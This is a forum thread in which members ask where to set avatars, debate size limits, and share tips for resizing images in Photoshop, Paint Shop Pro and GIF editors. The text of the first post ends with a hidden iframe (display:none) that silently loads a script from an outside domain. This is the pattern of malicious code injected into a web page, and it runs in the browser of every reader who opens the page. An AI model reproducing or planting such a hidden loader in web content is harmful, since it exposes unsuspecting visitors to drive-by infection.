+ Reply to Thread

Thread: Avatar gone?

As always you guys do a great job but I have one question. Are we still able to use Avatars under our screen name? If so how? I don't see anything to edit on my profile page. thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Dr. Van Nostren, from the clinic

Go to the "User CP" page, then click on "Edit Options" down at the bottom of that page is where you can add/edit your avatar.
    --Jazz--

Oh When that Shark Bites! LBOCEAN's Avatar
    Is there anyway of allowing for alittle larger Avitar, like previously?

Administrator
    larger avatars would probably require much more bandwidth and much more $$$...

Originally posted by marctronixx
    Yeah, I liked being the member (no pun intended) with the biggest, um, avatar ... but I think it's good to have a uniform and compact size limit.
    Please visit my picture site: Robert-O-Rama :)

Dang Robert, 14 frames.

I stuck to the original blinky light, but now with the smaller size requirements, i'm given consideration to making up something alittle different.

--------------------------
    And, as you can see now, Mack'ies Back n' Town!

if the avatars are "linked", it shouldn't have any bearing on bandwith should it.
    my avatar is on my server and is only "called" by the board.

i dunno though. i really don't.
    iBug
    mac osx usernew beetle pilotpowerbook operatorsmartphone communicator

Maybe I just wasn't paying close attention, but I got an e-mail notification that said that jimmyjoe had posted to this thread... but he hasn't. It seems that I have gotten a few other notifications like that also. Is it just my imagination or has anyone else seen this?

Also, supposedly you only get one notification until you have revisted the thread... but I have received multiple notifications to threads that I had not yet revisited. Is there a logical reason for this?

Not complaining about anything... just curious.
    Please visit my picture site: Robert-O-Rama :)

Edit Options...No wonder I was looking in the wrong place. Thanks for the reply. As you see I have fixed it.
    Dr. Van Nostren, from the clinic

damn, there's just not enough time jonn doe's Avatar
    A tip
    I placed my old avatar in and it rejected it as being over the 50x50 pixex limit and i had to resize it to fit. now it is back!
    Gets better every day...... the phone that is.
    *He who lives with the most toys, wins!*
    [and if you are not winning.... alcohol helps]

Administrator
    whats a good program to use to make custom avatars and/or to shrink a pic down? i have adobe photoshop 7 for months but have not used it yet

whats a good program to use to make custom avatars and/or to shrink a pic down? i have adobe photoshop 7 for months but have not used it yet
    I used Photoshop Elements to create and size my avatar, so you should be able to do it with Photoshop 7 without a problem.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

Administrator
    thanks Alex!

damn, there's just not enough time jonn doe's Avatar
    i used paint shop pro 7.04 out of habit from many years. has a lot of features for a slightly more basic progy. i especially like its multifaceted "screen" capture possibilities. of course all the usual photo editing stuff ....
    Gets better every day...... the phone that is.
    *He who lives with the most toys, wins!*
    [and if you are not winning.... alcohol helps]

PhotoImpact for me

Administrator
    so i am in photoshop now but i dont know what area to get into to resize my pic... can anyone shed some light for yer ol' buddy...:drink3

marx -

You have two basic options (and probably like seven zillion permutations) for image sizing.

With your file open in Photoshop, Under the Image menu, choose Image Size...
    The important block is the first one Pixel Dimensions.

I'm assuming you're dealing with a larger image and you want to shrink it down to fit the avatar space - 50 x 50 or whatever it is...

You will want both check boxes checked - Constrain Proportions and Resample Image. Also, make sure that Bicubicis the resampling method selected from the adjacent drop-down list. If your image isn't sqaure, change the Pixel Dimension value for the larger dimension to 50, and then you're done. (Well, you're done after you click OK, then save the image, then upload it, but I'm done.

PS - if you ever need to resample a small image trying to make a decent large image - you should check out a plugin called Genunie Fractals - it does a much better job of interpolation than the bicubic sampling photoshop provides.

Originally posted by alex_mathews
    I used Photoshop Elements to create and size my avatar, so you should be able to do it with Photoshop 7 without a problem.
    That won't work if your avatar is animated. You have to use an animated gif editor. There are animated gif editors available for use on the web that are free to use. Check out GifWorks
    Dave

If you are converting an animated image, and want to keep it the same, yes, you would have to tear down each portion, modify it, then re-assemble it.

However, if it's just one part of the animation you want, you can either break it down using a gif animation program to get the one part you are after like what Dave has suggested, or simple press the keyboards "Print Screen" button at the precise moment that portion of the image appears during it's animation.

Then simply paste into a working pallet to resize it.

Your working pallet can be the 50x50, to which at first, the image would appear to be super huge inside the box, but when re-deminsioning it, it will begin to shrink into the size of your smaller pallet.

If the image doesn't look correct, then use your Undo button within the image editor, then re-size again using different parameters until you get it to fit within the pallet.

Nothing against Photoshop, it's a Great! program, and I have it as well, but if you have never had the opportunity to work with image editing, it can be overkill, just to get the most simplist of things done.

If you feel this is true, trying using a more simpler program to get the basics down, then later, begin using the more advanced program.